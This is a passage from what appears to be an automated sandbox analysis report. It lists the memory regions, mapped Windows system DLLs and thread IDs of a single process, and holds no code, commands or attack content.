region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 4502 start_va = 0x1b80000 end_va = 0x1bfffff entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 4503 start_va = 0x1c00000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 4504 start_va = 0x1e00000 end_va = 0x1e61fff entry_point = 0x1e00000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 4505 start_va = 0x1e80000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4506 start_va = 0x1f10000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 4507 start_va = 0x1fd0000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 4508 start_va = 0x23e0000 end_va = 0x245ffff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 4509 start_va = 0x24a0000 end_va = 0x251ffff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 4510 start_va = 0x2530000 end_va = 0x25affff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 4511 start_va = 0x2620000 end_va = 0x269ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 4512 start_va = 0x26a0000 end_va = 0x2aa2fff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 4513 start_va = 0x2ac0000 end_va = 0x2b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 4514 start_va = 0x2b40000 end_va = 0x2bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 4515 start_va = 0x2be0000 end_va = 0x2c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002be0000" filename = "" Region: id = 4516 start_va = 0x2cb0000 end_va = 0x34affff entry_point = 0x0 region_type = private name = "private_0x0000000002cb0000" filename = "" Region: id = 4517 start_va = 0x34b0000 end_va = 0x35affff entry_point = 0x0 region_type = private name = "private_0x00000000034b0000" filename = "" Region: id = 4518 start_va = 0x35b0000 end_va = 0x362ffff entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 4519 start_va = 0x3680000 end_va = 0x36fffff entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 4520 start_va = 0x3790000 end_va = 0x380ffff entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 4521 start_va = 0x3810000 end_va = 0x3976fff entry_point = 0x3810000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4522 start_va = 0x39b0000 end_va = 0x3a2ffff entry_point = 0x0 region_type = private name = "private_0x00000000039b0000" filename = "" Region: id = 4523 start_va = 0x3a40000 end_va = 0x3abffff entry_point = 0x0 region_type = private name = "private_0x0000000003a40000" filename = "" Region: id = 4524 start_va = 0x3ac0000 end_va = 0x3b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ac0000" filename = "" Region: id = 4525 start_va = 0x3be0000 end_va = 0x3c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 4526 start_va = 0x3cb0000 end_va = 0x3d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 4527 start_va = 0x3d70000 end_va = 0x3deffff entry_point = 0x0 region_type = private name = "private_0x0000000003d70000" filename = "" Region: id = 4528 start_va = 0x3e60000 end_va = 0x3edffff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 4529 start_va = 0x3ee0000 end_va = 0x3f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ee0000" filename = "" Region: id = 4530 start_va = 0x3fa0000 end_va = 0x401ffff entry_point = 0x0 region_type = private name = "private_0x0000000003fa0000" filename = "" Region: id = 4531 start_va = 0x4050000 end_va = 0x40cffff entry_point = 0x0 region_type = private name = "private_0x0000000004050000" filename = "" Region: id = 4532 start_va = 0x4130000 end_va = 0x41affff entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 4533 start_va = 0x4220000 end_va = 0x429ffff entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 4534 start_va = 0x42b0000 end_va = 0x432ffff entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 4535 start_va = 0x752c0000 end_va = 0x752c2fff entry_point = 0x752c0000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 4536 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4537 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4538 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4539 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4540 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4541 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4542 start_va = 0xff730000 end_va = 0xff782fff entry_point = 0xff730000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 4543 start_va = 0xffaa0000 end_va = 0xffaaafff entry_point = 0xffaa0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4544 start_va = 0xffd00000 end_va = 0xffd61fff entry_point = 0xffd00000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 4545 start_va = 0x7feddaa0000 end_va = 0x7feddb4dfff entry_point = 0x7feddaa0000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 4546 start_va = 0x7feddb50000 end_va = 0x7feddc74fff entry_point = 0x7feddb50000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 4547 start_va = 0x7fedddd0000 end_va = 0x7fedddebfff entry_point = 0x7fedddd0000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 4548 start_va = 0x7fef5e10000 end_va = 0x7fef5e95fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 4549 start_va = 0x7fef6340000 end_va = 0x7fef638efff entry_point = 0x7fef6340000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 4550 start_va = 0x7fef86c0000 end_va = 0x7fef86dafff entry_point = 0x7fef86c0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4551 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4552 start_va = 0x7fefad70000 end_va = 0x7fefad80fff entry_point = 0x7fefad70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4553 start_va = 0x7fefaf10000 end_va = 0x7fefaf4afff entry_point = 0x7fefaf10000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 4554 start_va = 0x7fefaf50000 end_va = 0x7fefafa0fff entry_point = 0x7fefaf50000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 4555 start_va = 0x7fefafc0000 end_va = 0x7fefafc7fff entry_point = 0x7fefafc0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 4556 start_va = 0x7fefafd0000 end_va = 0x7fefafd9fff entry_point = 0x7fefafd0000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 4557 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4558 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4559 start_va = 0x7fefb4d0000 end_va = 0x7fefb4fbfff entry_point = 0x7fefb4d0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4560 start_va = 0x7fefb500000 end_va = 0x7fefb5abfff entry_point = 0x7fefb500000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 4561 start_va = 0x7fefb610000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb610000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 4562 start_va = 0x7fefb720000 end_va = 0x7fefb734fff entry_point = 0x7fefb720000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4563 start_va = 0x7fefb740000 end_va = 0x7fefb74bfff entry_point = 0x7fefb740000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4564 start_va = 0x7fefb780000 end_va = 0x7fefb793fff entry_point = 0x7fefb780000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 4565 start_va = 0x7fefb810000 end_va = 0x7fefb836fff entry_point = 0x7fefb810000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4566 start_va = 0x7fefb8a0000 end_va = 0x7fefb8aefff entry_point = 0x7fefb8a0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 4567 start_va = 0x7fefba40000 end_va = 0x7fefba8afff entry_point = 0x7fefba40000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 4568 start_va = 0x7fefbeb0000 end_va = 0x7fefbfdbfff entry_point = 0x7fefbeb0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4569 start_va = 0x7fefc540000 end_va = 0x7fefc548fff entry_point = 0x7fefc540000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 4570 start_va = 0x7fefc550000 end_va = 0x7fefc6e5fff entry_point = 0x7fefc550000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 4571 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 4572 start_va = 0x7fefc700000 end_va = 0x7fefc7bafff entry_point = 0x7fefc700000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 4573 start_va = 0x7fefc7c0000 end_va = 0x7fefc7c6fff entry_point = 0x7fefc7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4574 start_va = 0x7fefc8b0000 end_va = 0x7fefc8cafff entry_point = 0x7fefc8b0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4575 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4576 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4577 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4578 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4579 start_va = 0x7fefcdb0000 end_va = 0x7fefcdb6fff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4580 start_va = 0x7fefcdc0000 end_va = 0x7fefce14fff entry_point = 0x7fefcdc0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4581 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4582 start_va = 0x7fefd050000 end_va = 0x7fefd0bcfff entry_point = 0x7fefd050000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 4583 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4584 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4585 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4586 start_va = 0x7fefd4d0000 end_va = 0x7fefd50cfff entry_point = 0x7fefd4d0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4587 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4588 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4589 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4590 start_va = 0x7fefd680000 end_va = 0x7fefd6b9fff entry_point = 0x7fefd680000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 4591 start_va = 0x7fefd6c0000 end_va = 0x7fefd6d9fff entry_point = 0x7fefd6c0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4592 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4593 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4594 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f5fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4595 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4596 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4597 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4598 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 4599 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 4600 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 4601 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4602 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4603 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4604 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4605 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4606 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4607 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4608 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4609 start_va = 0x7feff650000 end_va = 0x7feff826fff entry_point = 0x7feff650000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 4610 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4611 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4612 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 4613 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 4614 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 4615 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 4616 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 4617 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 4618 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 4619 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 4620 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 4621 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 4622 start_va = 0x7fffff80000 end_va = 0x7fffff81fff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 4623 start_va = 0x7fffff82000 end_va = 0x7fffff83fff entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 4624 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 4625 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 4626 start_va = 0x7fffff88000 end_va = 0x7fffff89fff entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 4627 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 4628 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 4629 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 4630 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 4631 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 4632 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 4633 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 4634 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 4635 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 4636 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4637 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4638 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4639 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4640 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4641 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4642 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4643 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4644 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4645 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4646 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4647 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 4648 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 4649 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4650 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4651 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 4652 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 327 os_tid = 0x1c8 Thread: id = 328 os_tid = 0x844 Thread: id = 329 os_tid = 0x944 Thread: id = 330 os_tid = 0x864 Thread: id = 331 os_tid = 0x9e8 Thread: id = 332 os_tid = 0xab8 Thread: id = 333 os_tid = 0x7c4 Thread: id = 334 os_tid = 0x9fc Thread: id = 335 os_tid = 0x20c Thread: id = 336 os_tid = 0x814 Thread: id = 337 os_tid = 0x924 